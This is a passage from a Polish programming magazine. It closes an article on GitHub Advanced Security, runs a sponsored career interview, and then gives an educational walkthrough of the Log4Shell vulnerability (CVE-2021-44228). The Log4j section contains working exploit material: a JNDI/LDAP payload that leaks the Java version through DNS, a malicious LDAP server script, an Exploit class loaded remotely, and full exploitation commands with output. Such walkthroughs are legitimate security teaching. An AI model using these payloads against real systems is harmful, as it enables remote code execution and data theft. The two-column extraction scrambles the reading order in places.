BEZPIECZEŃSTWO

Rysunek 9. Podatności znalezione w ramach funkcji Code Scanning dostępne są w zakładce Security w sekcji Code Scanning Alerts

Rysunek 10. Dla każdej podatności zidentyfikowanej w ramach funkcji Code Scanning użytkownik może zapoznać się z opisem zidentyfikowanego błędu, miejscem jego występowania
w kodzie, poziomem ryzyka, jaki generuje, powiązanym przepływem danych oraz rekomendacją odnośnie sposobu jego usunięcia

<58> { 2 / 2022 < 101 > }

 / Funkcje bezpieczeństwa w GitHub Advanced Security /

nego tworzonego podczas pierwszej konfiguracji to codeql-analysis. Security. Domyślna strategia akcji ma wyłączoną pozycję fail-
yml. Konfiguracja pliku opiera się na składni GitHub Actions.36 fast, która anuluje wykonywanie pozostałych zadań, jeżeli niepo-
wodzeniem zakończył się skan jednego z języków znajdujących się
Listing 1. Po wybraniu przycisku Configure CodeQL alerts generowany jest
domyślny plik codeql-analysis.yml odpowiedzialny za wykonanie skanu z w macierzy (ang. matrix). GitHub automatycznie wypełnia pozycję
wykorzystaniem silnika CodeQL i GitHub Actions macierzy języków, które znajdują się w repozytorium i mają być ob-
name: "CodeQL"
jęte procesem Code Scanning. Opis procesu (ang. steps) w ramach
zadania obejmuje następujące kroki: wykonanie operacji check­out
on:
push: dla repozytorium, inicjalizacja skanera CodeQL, zbudowanie kodu
branches: [ master ]
pull_request:
oraz przeprowadzenie analizy bazy CodeQL w celu wykrycia po-
branches: [ master ] datności. Pierwotna konfiguracja skanu nie dołącza dodatkowych
schedule:
- cron: '36 0 * * 5' kwerend bezpieczeństwa CodeQL (zakomentowana sekcja queries),
warto jednak wiedzieć, że możliwe jest zwiększenie identyfikowa-
jobs:
analyze: nych błędów przez dołączenie dodatkowego garnituru kwerend se-
name: Analyze
runs-on: ubuntu-latest
curity-extended czy security-and-quality. Konfiguracja jest czytelna,
permissions: a bariera wejścia do jej modyfikacji nie powinna stanowić problemu
actions: read
contents: read dla statystycznego użytkownika repozytorium GitHub. Więcej o kon-
security-events: write figuracji procesu Code Scanning z wykorzystaniem silnika CodeQL
strategy: można przeczytać w dokumentacji platformy GitHub37.
fail-fast: false
matrix:
Jak już wspomnieliśmy wcześniej, funkcja Code Scanning ko-
language: [ 'javascript' ] rzysta z mechanizmu GitHub Actions, a każde uruchomienie skanu
steps: kodu konsumuje minuty GitHub Actions. Na szczęście osoby prze-
- name: Checkout repository
chowujące swój kod w publicznych repozytoriach nie muszą przej-
uses: actions/checkout@v2
mować się limitem minut GitHub Actions.
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL Jeśli skanowanie kodu wykryje potencjalną lukę lub błąd w ko-
uses: github/codeql-action/init@v1 dzie, GitHub wyświetli alert w zakładce Security w sekcji Code Scan-
with:
languages: ${{ matrix.language }} ning Alerts (Rysunek 9). Alert zostaje usunięty, jeśli kod zostanie
# Uncomment below to use additional security queries
#queries: security-extended
naprawiony.

# Autobuild attempts to build any compiled

# languages (C/C++, C#, or Java).
- name: Autobuild
uses: github/codeql-action/autobuild@v1
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@v1
Domyślna konfiguracja zawarta w pliku codeql-analysis.yml dla skanu
z wykorzystaniem silnika CodeQL zawiera (w sekcji on) wyzwalacz
kodu oparty na zdarzeniach: push i pull_request do repozyto-
rium master oraz cykliczny skan (sekcja schedule) wyznaczony
w jednym momencie w tygodniu. Akcja skanowania wykonywana
jest (parametr runs-on) w kontenerze utworzonym z obrazu ubuntu-
-latest i ma uprawnienia zapisu do sekcji bezpieczeństwa (security-
events: write) w celu aktualizacji poszczególnych pozycji w zakładce
36. https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions
PODSUMOWANIE
W tym artykule omówiliśmy mechanizmy bezpieczeństwa wcho-
dzące w skład pakietu GitHub Advanced Security (GHAS). Zaczę-
liśmy od opisu pułapek, jakie czyhają na programistów, a następnie
opisaliśmy, jak mechanizmy dostępne na platformie GitHub mogą
ograniczyć ryzyko związane z ich występowaniem. Wszystkie funk-
cje pakietu GitHub Advanced Security są darmowe dla repozytoriów
publicznych, dlatego zachęcamy do zapoznania się z dokumentacją
i samodzielnego przetestowania na GHAS38.
37. https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-
vulnerabilities-and-errors/configuring-code-scanning
38. https://docs.github.com/en/get-started/learning-about-github/about-github-advanced-security

WIKTOR SZYMAŃSKI WOJCIECH MAŚLANKA

kontakt@wiktorszymanski.pl Szuka dziury w całym jako Product Security
Na co dzień zajmuje się dbaniem o bezpieczeń- Engineer. Pasjonat podróży rowerowych, waltor-
stwo aplikacji webowych i mobilnych w zespole nista w Orkiestrze Reprezentacyjnej AGH. Wielką
Product Security. Współzałożyciel serwisu frajdę sprawia mu odkrywanie i poznawanie
bezpieczny blog, sympatyk dzielenia się wiedzą, nowych, nieuchwytnych rzeczy.
maniak planszówek, entuzjasta klocków LEGO,
miłośnik książek i filmów szpiegowskich.

{ WWW.PROGRAMISTAMAG.PL } <59>
Z DEVA DO VICE HEAD
OF DEVELOPMENT W TRYBIE „FAST”
Łukasz Krzemień
Vice Head of Development w Fast White Cat. Swoją wiedzą wspomaga dział software, wspiera-
jąc Head of Development. Posiada bogate doświadczenie w projektowaniu i wdrażaniu sklepów
na Magento 2, specjalizuje się także w zakresie architektury cloud’owej (AWS) i automatyzacji
procesów (CI/CD).
Jak długo pracujesz w Fast White Cat i ile czasu zajęło Ci, by zmie-
nić stanowisko z deva na Vice Heada? Co trzeba zrobić, czym się
wyróżnić, by u was awansować? Czy junior, który dostanie u FWC
zatrudnienie, ma szansę tak wysoko awansować?
Jestem w Fast White Cat od prawie pięciu lat i mniej więcej poło-
wę tego czasu pracuję już jako Vice Head of Development. Jeśli
chodzi o moją ścieżkę kariery, to stanowi ona doskonały przykład
tego, jak wysoko może zajść u nas junior. Gdy stawiałem pierwsze
kroki w FWC, gdzie przyszedłem z polecania znajomego, brakowa-
ło mi choćby podstawowej znajomości Magento. Miałem pracować
jako developer w dziale utrzymania z racji doświadczenia i obycia
jako FullStack. Przebywanie wśród doświadczonych kolegów, projek-
ty w FWC i bakcyl programowania, który połknąłem, sprawiły jed-
nak, że chciałem więcej – dlatego hobbystycznie zacząłem zajmować
się Magento także po pracy. Po kilku miesiącach byłem już pewien,
że to jest to, co chcę kontynuować. Zacząłem dostawać nowe zada-
nia w Fast White Cat – od tych małych, jak tylko sprawdzanie i po-
prawianie kodu, aż w końcu większych, jak projekt oparty na pracy
back­endowej i integracji z SAPem. Ostatecznie trafiłem do projektu
dla dużej marki odzieżowej, gdzie wykorzystałem wiedzę z poprzed-
nich zadań, która pozwoliła mi na go live sklepu w terminie i spięcie
całego projektu, wraz z częścią devopsową, integracją z ERP i opiekę
nad infrastrukturą. To był moment przełomowy, kiedy wziąłem na
siebie dużą odpowiedzialność. Zostało to docenione i przełożony za-
proponował mi stanowisko Vice Heada.
A jeśli chodzi o umiejętności – zarówno miękkie, jak i twarde
– które udało Ci się rozwinąć w FWC? Zauważasz jakąś zmianę?
Przede wszystkim zdobyłem ogromną wiedzę o Magento. Jak wspo-
minałem, przychodząc do FWC, zupełnie nie zajmowałem się tym
frameworkiem, ale co ciekawe – nie znałem także Dockera, AWS
i usług typu Varnish, Redis, ElasticSearch, RabbitMQ, które w końcu
musiałem wykorzystywać podczas pracy w projektach. Moja deter-
<60> { MATERIAŁ INFORMACYJNY }
minacja i chęć uczenia się sprawiły jednak, że nabyłem te umiejęt-
ności i mogłem wspierać nimi zespół. Ciekawą nowością i źródłem
wiedzy była dla mnie również praca w Scrumie i software house
w ogóle – uporządkowane procesy i dobrze zaplanowane projek-
ty znacznie ułatwiły pracę na każdym szczeblu, a fakt, że atmosfera
w Kocie zawsze była przyjazna, sprawił, że uczenie się nowych rzeczy
było prostsze. Zresztą, w FWC dba się o to, by developerzy mieli za-
pewniony rozwój – do dziś mamy cykliczne, cotygodniowe lub co-
dwutygodniowe szkolenia wewnętrzne w formie prezentacji lub live
codingu, na których uczymy się nowych rzeczy.
Proszę opowiedzieć o najbardziej fascynującym projekcie, nad ja-
kimi pracowałeś w FWC.
Tych jest sporo, ale wskazałbym tu projekt, dzięki któremu awansowa-
łem – to dzięki niemu mój poziom znajomości Magento znacząco się
poprawił, nauczyłem się też łączyć tę wiedzę z umiejętnościami dev­
opsowymi, rozwiązywać problemy na styku tych dwóch kwestii. Był
to projekt związany z potrzebą optymalizacji szybkości działania Ma-
gento, zadbaniem o UX, integrację, wymianą danych o produktach,
statusów zamówień itd. Pełen projekt eCommerce, który spowodo-
wał, że dogłębnie poznałem mechanizmy działania Magento i wszel-
kich usług dookoła niego, a co za tym idzie – Vanisha, RabbitMQ itd.
Czy Vice Head of Development w Fast White Cat zajmuje się jesz-
cze programowaniem, czy może tylko zarządza zespołem? Jakie
są główne zadania na takim stanowisku, jakie teraz obejmujesz
w firmie?
Programowaniem zajmuję się już znacznie mniej – to raczej praca
wymagająca poprawek czy dopisek do powstałego kodu, nic mocno
angażującego. Mam pod sobą dział Devops i Backend, a zarządzanie
nimi jest dość absorbujące – rozdzielam zadania, planuję i organizuję
pracę moim kolegom, wspieram ich, oferując konsultacje, reaguję na
awarie na produkcji czy inne problemy związane z działaniem środo-
wiska lokalnego lub testowego. Do tego dochodzi oczywiście udział
w spotkaniach, no i coś, co u nas w Kocie jest niezwykle ważne – pra-
ca związana z Reaserch and Development. Wciąż rozwijamy wiedzę,
szukamy nowinek w kontekście technologii do wykorzystania czy to
w Magento, czy w pracy devopsów, badamy nowe narzędzia i podej-
mujemy działania z jeszcze efektywniejszą automatyzacją projektów
czy wydań.
Jak dzisiaj możesz ocenić realia pracy w FWC? Co sprawia, że nadal
tu pracujesz, jakie wartości tej organizacji przemawiają do Cie-
bie najmocniej, jako developera z doświadczeniem? Czy uważasz,
że firma się zmieniła?
To, co sprawia, że wciąż jestem częścią Fast White Cat, to rozwój,
jaki zapewnia mi firma. U nas zdobywanie kolejnych umiejętności
i wchodzenie na wyższy poziom jest wartością, o którą zarząd, jak
i cały zespół bardzo mocno dbają. Developerzy i Tech Leaderzy
są stale motywowani, aby szukali kontaktu ze mną lub Head of Deve-
lopment, zgłaszali swoje pomysły, dążyli do dzielenia się ciekawost-
kami technologicznymi ze swoich projektów – dzięki temu możemy
wzajemnie korzystać z własnych doświadczeń, tworzymy i wciąż
rozwijamy wspólne paczki wiedzy, z których razem czerpiemy. Tutaj
każdy developer ma wpływ na to, jak wygląda praca w firmie.
To, co zmieniło się w FWC przez ostatnie 5 lat, to na pewno or-
ganizacja pracy, która teraz jest lepiej zautomatyzowana i ustandary-
zowana. W efekcie pracuje się sprawniej – dziś stawiamy środowisko
lokalne czy serwer testowy kilkadziesiąt razy szybciej, niż wtedy. Każ-
dy przejęty sklep stawiany jest w naszym szkielecie, co zwiększa po-
ziom bezpieczeństwa pracy developera i po prostu ją usprawnia. To
właśnie zasługa automatyzacji i wspólnego doświadczenia, z którego
czerpiemy. No i tego, że wciąż chcemy więcej.
{ MATERIAŁ INFORMACYJNY }
Jak myślisz, czy developerzy przychodzący do FWC z innych firm
odczuwają różnicę w zmianie pracy? Na czym ona polega?
To, co na pewno nas wyróżnia, to sama kultura FWC – dbamy o rze-
telne feedbacki, usprawnianie umiejętności miękkich, mamy atmosfe-
rę, która jest wyjątkowa, i zarząd bardzo otwarty na rozmowy i nasze
pomysły. Bardzo ważna rzecz w Kocie to także praca z nowymi tech-
nologiami. U nas nie znajdziecie już Magento 1 – pracujemy tylko na
najnowszej wersji, mamy też sporo projektów opartych o PWA, a teraz
wdrażamy także Sztuczną Inteligencję, która na pewno będzie cieka-
wym wyzwaniem dla naszych developerów – to spore przedsięwzię-
cie, na które dostaliśmy grant w ramach Narodowego Centrum Badań
i Rozwoju. Mamy też dział Devops, który nie jest wcale normą w każ-
dej firmie, a stanowi duże ułatwienia dla developerow, no i to, o czym
parokrotnie wspominałem, czyli wyjątkowo poukładaną pracę.
Jakie rekrutacje w tej chwili prowadzicie?
Szukamy Backend Developerów ze znajomością Magento – projekty
w Fast White Cat rozwijają się na tyle stabilnie, że właściwie może-
my stale zapraszać do rekrutacji na to stanowisko. Potrzebujemy też
developerów PHP z doświadczeniem w Symfony, ale mamy również
coś zupełnie nowego dla tych, którzy chcą rozwijać swoją wiedzę
i przejść do świata naszej flagowej platformy. Uruchomiliśmy nie-
dawno Akademię Magento 2, w której szkolimy developerów PHP,
dzielimy się z nimi wiedzą i wspieramy w rozwijaniu kariery na
wszystkich szczeblach – od wdrażania się i specjalizowania w Ma-
gento, przez budowanie doświadczenia w eCommerce, aż po zdoby-
wanie certyfikatów i wyższe wynagrodzenia. Zapewnimy efektywną
naukę w czteroosobowych grupach i płynne wejście w platformę Ma-
gento2. Zapraszamy: fastwhitecat.com/akademia-magento.
<61>
Z ARCHIWUM CVE

Log4j
Jednym z najpopularniejszych języków programowania jest dziś Java. Wiele dużych firm (takich
jak banki czy te z gałęzi E-commerce) decyduje się na tworzenie aplikacji właśnie w nim.
Dodatkowo jest to główny język programowania na platformie Android. Natomiast sam język
to nie wszystko. Potrzebne są do niego także biblioteki. W tym artykule przyjrzymy się, jak
poważny w skutkach może być błąd w najpopularniejszej, napisanej w Javie, bibliotece służą-
cej do logowania zdarzeń. Czy eksperci przesadzali, okrzykując go najpoważniejszym błędem
w ostatniej dekadzie?

Apache Log4j jest biblioteką służącą do tworzenia logów dla apli- Listing 1. Plik Dockerfile ściągający starą wersję Log4j
kacji napisanych w języku Java. Wyróżnia się dwie wersje: Log4j 1.x
FROM openjdk:11
oraz Log4j 2.x. Wersja pierwsza nie jest rozwijana od 2015 r. i ma
RUN mkdir -p /app
wiele znanych podatności (takich jak CVE-2022-23307 i CVE-2019- WORKDIR /app
17571). Użytkownicy nie powinni zatem z niej korzystać. ARG URL="https://archive.apache.org/dist/logging/log4j/"
Poza nazwą wersja druga niewiele ma wspólnego z wersją pierwszą. RUN wget $URL/2.14.0/apache-log4j-2.14.0-bin.zip && \
unzip -x apache-log4j-2.14.0-bin.zip
Programiście tworząc Log4j 2.x, napisali ją od zera. Podczas tworzenia
ENV LOG4J_DIR="apache-log4j-2.14.0-bin"
architektury inspirowali się pierwotną wersją oraz wbudowanym w Javę ENV API_JAR="$LOG4J_DIR/log4j-api-2.14.0.jar"
mechanizmem java.util.logging. Wersja druga nie jest kompaty- ENV CORE_JAR="$LOG4J_DIR/log4j-core-2.14.0.jar"
ENV CLASSPATH="$API_JAR:$CORE_JAR"
bilna ze swoim prekursorem. Jedną z zalet biblioteki Log4j 2.x jest to,
COPY *.java /app
że poza napisami potrafi także logować wiadomości (ang. messages)1,
wspiera obsługę lambd oraz wtyczek. W przeciwieństwie do wersji ENTRYPOINT ["java", "Test.java"]

pierwszej, czy do alternatywnego rozwiązania Logback, Log4j 2.x nie

gubi wiadomości podczas rekonfiguracji środowiska. Listing 2. Szkielet klasy Test
Log4j przez lata zyskiwał na popularności wśród programistów2.
import org.apache.logging.log4j.Logger;
Szacuje się, że w okresie 4 miesięcy (między sierpniem 2021 a li- import org.apache.logging.log4j.LogManager;
stopadem 2021) biblioteka została ściągnięta 28 milionów razy, co class Test {
umieszcza ją na 252 pozycji najczęściej pobieranych bibliotek. Log4j private static final Logger logger =
LogManager.getLogger("Test");
zyskała taką popularność, ponieważ była wykorzystana przez takie
public static void main(String[] args) {
produkty jak Amazon Web Services, Cloudflare, Steam, iCloud, Mi- // Do uzupełnienia
necraft, a nawet jako komponent w marsjańskim łaziku stworzonym }
}
przez NASA3.

ŚRODOWISKO TESTOWE W celu uruchomienia tego środowiska kontenerowego należy wyko-

nać instrukcje z Listingu 34.
Aby prześledzić przykłady związane z Log4j, przygotujemy małe śro- Po każdej zmianie w klasie należy pamiętać o przebudowie obra-
dowisko Javy. W tym celu posłużymy się kontenerem dockerowym, zu kontenera.
którego obraz można zbudować z pliku Dockerfile zaprezentowanego
Listing 3. Budowanie i uruchamianie kontenera dockerowego
w Listingu 1.
Nasze środowisko bazujemy na obrazie z Javą 11. Musimy także $ docker build -t log4j .
Sending build context to Docker daemon 68.61kB
ściągnąć podatną na opisywany błąd wersję Log4j, w pliku Dockerfile, Step 1/11 : FROM openjdk:11
wykonując komendę wget(1). Ustawiamy CLASSPATH, tak aby Java Pulling from library/openjdk
e4d61adff207: Pull complete
mogła znaleźć bibliotekę Log4j (dodatkowe zmienne mają na celu [...]
Successfully built 4015a82b374f
nadanie czytelności listingu). Na końcu ustawiamy nasz program w Ja- Successfully tagged log4j:latest
vie zdefiniowany w pojedynczym pliku Test.java. Szkielet klasy z tego $ docker run --rm -ti log4j
$
pliku został zaprezentowany w Listingu 2.

1. Temat różnicy między wiadomością a napisem wykracza poza ramy tego artykułu. Dla zainteresowa-
nych polecamy oficjalną dokumentację Log4j: logging.apache.org/log4j/2.x/manual/messages.html
2. Źródło: https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fire 4. Aby zainstalować Dockera na swoim komputerze, należy postępować zgodnie z instrukcją ze
3. Źródło: https://www.techradar.com/news/even-the-ingenuity-mars-helicopter-is-vulnerable-to-log4j strony https://docs.docker.com/engine/install.

<62> { 2 / 2022 < 101 > }


LOG4J LOOKUP
Jednym z mechanizmów w bibliotece Log4j jest tak zwany Lookup.
Funkcjonalność ta polega na szukaniu w logowanym tekście wzorca
${prefiks:nazwa}. W momencie gdy taki wzorzec zostanie znale-
ziony, Log4j podstawi w jego miejsce nową wartość. Log4j wyróżnia
kilka prefiksów, na przykład:
» env – umożliwiający odczytanie zmiennej środowiskowej,
» java – umożliwiający odczytanie informacji o środowisku
Java, na przykład wersji wirtualnej maszyny czy wersji systemu
operacyjnego,
» docker – umożliwiający odczytanie informacji o kontenerze,
w którym uruchomiony jest program.
W Listingu 4 mamy kilka przykładowych definicji wiadomości ko-
rzystających z mechanizmu Lookup. W listingu tym można także
zaobserwować wynik wykonania kodu. Tekst ${java:version}
został zamieniony na informację o aktualnej wersji Javy, natomiast
${env:HOSTNAME} na wartość zmiennej środowiskowej HOSTNAME
(która w kontenerach dockerowych zawiera skrócone ID kontenera).
Listing 4. Przykład logowania wiadomości z Log4j
// Funkcja main w pliku Test.java
public static void main(String[] args) {
logger.error("Runs ${java:version}!");
logger.error("Hostname: ${env:HOSTNAME}!");
} probowal sie zalogowac!
# Przykład uruchomienia
$ docker build -t log4j .
[...]
$ docker run --rm -ti log4j
[main] ERROR Test - Runs Java version 11.0.14.1!
[main] ERROR Test - Hostname: 8668c25a4914!
PODATNOŚĆ W LOG4J
Pod koniec ubiegłego roku Chen Zhaojun z firmy Alibaba Cloud
zgłosił błąd, który został opatrzony numerem CVE-2021-44228
– potocznie nazywanym Log4Shell. W zgłoszeniu okazało się, że
jeżeli użytkownik kontroluje fragment logowanej wiadomości, na
przykład jeżeli do logów są zrzucone wartości nagłówków HTTP lub
login użytkownika, który próbował się zalogować, może on zmusić
Log4j do zinterpretowania jego tekstu i wykorzystania funkcjonal-
ności Lookup.
Listing 5. Logowanie wiadomości kontrolowanej przez użytkownika
public static void main(String[] args) {
logger.error(args[0]);
logger.error("Uzytkownik {} probowal sie zalogowac!", args[0]);
} zania nazwy serwera do adresu IP. Jeżeli zamienilibyśmy domenę
W celu zaobserwowania tego zachowania skorzystamy z funkcji
w Listingu 5. W tej funkcji zamiast logować stały tekst, przekaże-
my do Log4j zmienną kontrolowaną przez użytkownika – argument
wywołania programu. W Listingu 5 zmienna kontrolowana przez
użytkownika jest przekazywana jako pierwszy argument do funkcji
logującej. Pierwszy argument jest często nazywany tekstem forma-
{ WWW.PROGRAMISTAMAG.PL }
/ Log4j /
tującym, jako że pod jego definicję podstawia się kolejne wartości.
Takie wywołanie funkcji jednak zdarza się rzadko – z reguły tekst
kontrolowany przez użytkownika jest częścią większej wiadomości.
Dodatkowo osoby, które programują w C/C++ – albo zajmują się
bezpieczeństwem niskopoziomowym – mogą automatycznie sko-
jarzyć ten problem z błędem typu format string attack. Dlatego też
w drugim wywołaniu zmienna kontrolowana przez użytkownika zo-
stała użyta jako argument, który ma być podstawiony do wcześniej
zdefiniowanego napisu.
W Listingu 6 zostały przedstawione dwa wywołania programu.
W pierwszym przypadku wywołujemy program z argumentem "Pro-
gramista". Zgodnie z oczekiwaniami zostały wygenerowana dwa
logi. W przypadku drugiego wywołania tekst przekazany przez użyt-
kownika to ${env:HOSTNAME}. Okazuje się, że Log4j zamiast zalogo-
wać tekst podany przez użytkownika, skorzystał z funkcjonalności
Lookup i podstawił nowe wartości. Możemy zauważyć, że dla Log4j
nie miało znaczenia, czy tekst jest podany jako tekst formatujący, czy
jako argument podstawiany w tekście.
Listing 6. Logowanie wiadomości kontrolowanej przez użytkownika
$ docker run --rm -ti log4j 'Programista'
[main] ERROR Test - Programista
[main] ERROR Test - Uzytkownik Programista
probowal sie zalogowac!
$ docker run --rm -ti log4j '${env:HOSTNAME}'
[main] ERROR Test - 483ac4fb30f7
[main] ERROR Test - Uzytkownik 483ac4fb30f7
Dlaczego zatem ten błąd jest tak poważny? Przecież w najgorszym
wypadku zamiast nazwy użytkownika zostanie zalogowana nazwa
maszyny (Hostname). Jeżeli logi nie są prezentowane użytkowniko-
wi w żadnej postaci, to nie ma tutaj mowy nawet o żadnym wycieku
informacji z serwera.
Kluczem okazuje się prefiks rozpoznawany przez Log4j – JNDI,
który jest skrótem od Java Naming and Directory Interface. Jest to
prefiks umożliwiający skorzystanie z usług katalogowych takich jak
LDAP czy Active Directory oraz usług rozwiązywania nazw takich
jak DNS do pobierania serializowanych obiektów Java.
W oryginalnym zgłoszeniu od Chen Zhaojun został wykorzysta-
ny protokół LDAP. Dodatkowo wydaje się on najprostszy dla celów
demonstracyjnych, dlatego też na nim się skupimy. Możliwe są jed-
nak także inne wektory ataków.
Wykorzystując funkcjonalności JNDI i LDAP, spróbujmy przepro-
wadzić wyciek informacji z serwera. W Listingu 7 zaprezentowano
przykładowe uruchomienie programu wykorzystującego rozszerzenie
JNDI i protokołu LDAP. W pierwszej kolejności przed połączeniem
do serwera LDAP Log4j wykonał zapytanie DNSowe w celu rozwią-
example.com na domenę kontrolowaną przez nas, w logach DNSo-
wych otrzymalibyśmy informację o aktualnej wersji Javy. Ponieważ
eksperyment przeprowadzamy w kontrolowanym przez nas środowi-
sku, możemy sprawdzić, czy zapytanie faktycznie zostało wykonane.
W tym celu skorzystamy z narzędzia tcpdump(1). Przykład użycia
i wynik został zaprezentowany w Listingu 8. Wyciek danych zazna-
czono kolorem czerwonym.
<63>
Z ARCHIWUM CVE

Listing 7. Przykład wykorzystania JNDI do wycieku informacji z kontenera RUN npm install ldapjs@2.3.2

$ docker run -ti log4j \ COPY ls.js /app

'${jndi:ldap://${sys:java.version}.example.com}'
ERROR Test - ${jndi:ldap://${sys:java.version}.example.com}
ERROR Test - Hello user
${jndi:ldap://${sys:java.version}.example.com}!
Listing 8. Obserwacja zapytań DNS przy pomocy narzędzia tcpdump(1)
$ sudo tcpdump -i enp0s5 'port 53'
IP u-wing.42760 > dns.google.domain:
48424+ A? 11.0.14.1.example.com
W celu zdalnego wykonania kodu posłużymy się metodą polegającą
na wstrzyknięciu nowego obiektu klasy z usługi katalogowej LDAP.
Jeżeli w ramach odpowiedzi LDAP moduł JNDI znajdzie atrybut ob-
jectClass o wartości javaNamingReference, spróbuje on pobrać
referencję do nowego obiektu. W tym celu potrzebne są jeszcze pola:
» javaCodebase – definiujące, z jakiego serwera pobrać kod;
można zastosować na przykład protokół HTTP,
» javaClassName – nazwa klasy, która ma być użyta do stworze-
nia obiektu,
» javaFactory – nazwa fabryki (ang. factory), która ma zostać
użyta do stworzenia klasy zdefiniowanej w javaClassName.
Okazuje się, że najbardziej zwięzłym rozwiązaniem będzie utworze-
nie serwera LDAP, stosując skrypt Node.js wykorzystujący bibliotekę
ldapjs. Kod serwera został zaprezentowany w Listingu 9. Najciekaw-
szy fragment to metoda search, która dla pustego filtra LDAP zwraca
obiekt, który zawiera 4 wymienione wyżej atrybuty. Jako javaCode­
base podaliśmy adres kolejnego serwera HTTP.
Listing 9. Kod serwera LDAP
const ldap = require('ldapjs');
const server = ldap.createServer();
server.search('', (req, res, next) => {
console.log("search");
res.send({
dn: req.dn.toString(),
attributes: {
objectClass: ['javaNamingReference'],
javaClassName: ['Exploit'],
javaFactory: ['Exploit'],
javaCodebase: ['http://192.168.67.100:8080/'],
} );
});
res.end();
});
server.listen(9999, '0.0.0.0', () => {
console.log(
'LDAP server listening at %s',
server.url
);
});
W celu uruchomienia kodu serwera LDAP można zainstalować lo-
kalnie Node.js i za pomocą narzędzia npm ściągnąć bibliotekę lda-
pjs. Alternatywnie można skorzystać z kontenera dockerowego, który
można zbudować z Dockerfile zaprezentowanego w Listingu 10.
Listing 10. Dockerfile do uruchamiania serwera LDAP w Node.js
FROM node:lts-alpine3.15
ENTRYPOINT ["nodejs", "ls.js"]
Nie pozostaje nam nic innego jak utworzenie klasy Exploit. Została
ona zaprezentowana w Listingu 11. W ramach zdalnego wykonania
kodu wypiszemy po prostu dodatkową wiadomość na standardowe
wyjście. Oczywiście kod tej klasy może być bardziej skomplikowany
i zawierać na przykład kod reverse shell’a. Wywołany kod nie znajduje
się w żadnej metodzie, tylko w bloku static. Jest to intencjonalne
działanie po to, by w momencie, gdy Java załaduje daną klasę, kod od
razu się wykonał.
Listing 11. Klasa Exploit
public class Exploit {
static {
System.out.println("Exploited!");
}
}
Okazuje się, że zdalne wykonanie kodu za pomocą LDAPa nie zawsze
jest możliwe. Jest ono zależne od wersji Javy i jej konfiguracji. W wersji
Javy równej i powyżej 6u211, 7u201, 8u191 i 11.0.1 do pełnej explo-
itacji wymagane jest, aby Java była skonfigurowana z opcją com.sun.
jndi.ldap.object.trustURLCodebase ustawioną na wartość true.
Opcja ta włącza/wyłącza interpretacje parametru javaCodebase po-
branego z usługi katalogowej. Poniżej tych wersji exploitacja log4j
za pomocą LDAPa jest zawsze możliwa. Ponadto w bibliografii na
końcu artykułu znajduje się link do artykułu Alvaro Muñoza i Olek-
sandra Mirosha z firmy Hewlett Packard, które opisują inne techniki
exploitacji za pomocą JNDI. Aby włączyć tę opcję do kodu, należy
dodać kod z Listingu 11, albo skorzystać z opcji `-Dcom.sun.jndi.
ldap.object.trustURLCodebase=true` przy uruchamianiu Javy
(czyli w naszym przypadku należałoby zmodyfikować dyrektywę EN-
TRYPOINT w pliku Dockerfile z Listingu 1).
Listing 11. Włączenie opcji trustURLCodebase dla nowszych wersji Java
System.setProperty(
"com.sun.jndi.ldap.object.trustURLCodebase",
"true"
Zakładając wprowadzenie poprawki z Listingu 11 do naszego testo-
wego programu, wreszcie w Listingu 12 zaprezentowano wszystkie
pozostałe kroki, które należy wykonać w celu exploitacji. W pierw-
szej konsoli przygotowujemy skompilowaną klasę Exploit, a następ-
nie uruchamiamy serwer HTTP; w naszym przypadku jest to serwer
dostarczony z językiem programowania Python. Domyślnie serwuje
on wszystkie pliki, które znajdują się w tym katalogu i podkatalogach.
W drugiej konsoli budujemy obraz Dockera zawierający serwer
LDAP z Listingu 9.
Finalnie uruchamiamy naszą podatną aplikację i próbujemy po-
łączyć się do nowo zdefiniowanego serwera LDAP. Na czerwono zo-
stał zaznaczony wynik naszego wstrzykniętego kodu.

RUN mkdir -p /app

WORKDIR /app

<64> { 2 / 2022 < 101 > }

 / Log4j /

Rysunek 1. Liczba ataków od momentu ujawnienia błędu w Log4J. Opracowanie na podstawie: Check Point Research https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-
pandemic-detailed-dive/

Listing 12. Exploitacja formatMsgNoLookups) lub usunięcie klasy org.apache.logging.

log4j.core.lookup.JndiLookup. Dziś ze względu na popularność
# Katalog i konsola z plikiem
# Exploit.java i powagę błędu stanowczo rekomenduje się aktualizację do najnow-
$ javac Exploit.java
$ python3 -m http.server 8080 szej wersji Log4j.
Po błędzie log4shell pojawiły się kolejne, jak na przykład CVE-2021-
# Katalog i konsola z plikiem Dockerfile dla
# serwera ldap Kod źródłowy z Listingu 9 45046 – który może doprowadzić do ataku DoS (braku dostępu do usłu-
# znajduję się w pliku ls.js
$ docker build -t ls .
gi). Następnym zgłoszonym błędem jest CVE-2021-45046. Okazało się,
$ docker run -ti -p 9999:9999 ls że wymienione wyżej poprawki były niepełne i w niektórych konfigura-
# Katalog i konsola z klasą cjach dalej występowała możliwość zdalnego wykonania kodu.
# testową uzupełnioną o
Mówiąc o historii tego błędu, warto zwrócić uwagę także na ilość
# com.sun.jndi.ldap.object.trustURLCodebase
$ docker run -t log4j '${jndi:ldap://192.168.67.100:9999/}' prób ataków z jego wykorzystaniem. Na Rysunku 1 znajduje się wy-
Exploited!
[main] ERROR Test - ${jndi:ldap://192.168.67.100:9999/}
kres przygotowany przez firmę Check Point Research. W ciągu 72
Exploited! godzin od jego publikacji przeprowadzono milion ataków.
[main] ERROR Test -
Uzytkownik ${jndi:ldap://192.168.67.100:9999/}
probowal sie zalogwac!
PODSUMOWANIE
Zwróćmy uwagę, że podatne na ten błąd są wszystkie aplikacje ko- Wykorzystanie modułu JNDI jest wyjątkowo rzadkie. Wydaje się
rzystające z Log4j. Nie ma znaczenia, czy jest to aplikacja webowa, wręcz, że ta opcja w bibliotece, która ma służyć do logowania zdarzeń
łazik marsjański czy aplikacja desktopowa. Tak długo, aż w logowanej w systemie, jest zbędna. Dlatego też przed dodaniem nowych funk-
wiadomości jest fragment kontrolowany przez użytkownika, możli- cjonalności do naszego oprogramowania warto się zastanowić, czy
wa jest exploitacja tego błędu. na pewno jest ona potrzebna. Taka funkcjonalność może okazać się
problematyczna albo, co gorsza, może być błędem bezpieczeństwa.

NAPRAWA BŁĘDU
Bibliografia
Błąd został zgłoszony 23 października 2021 roku do projektu Apache,
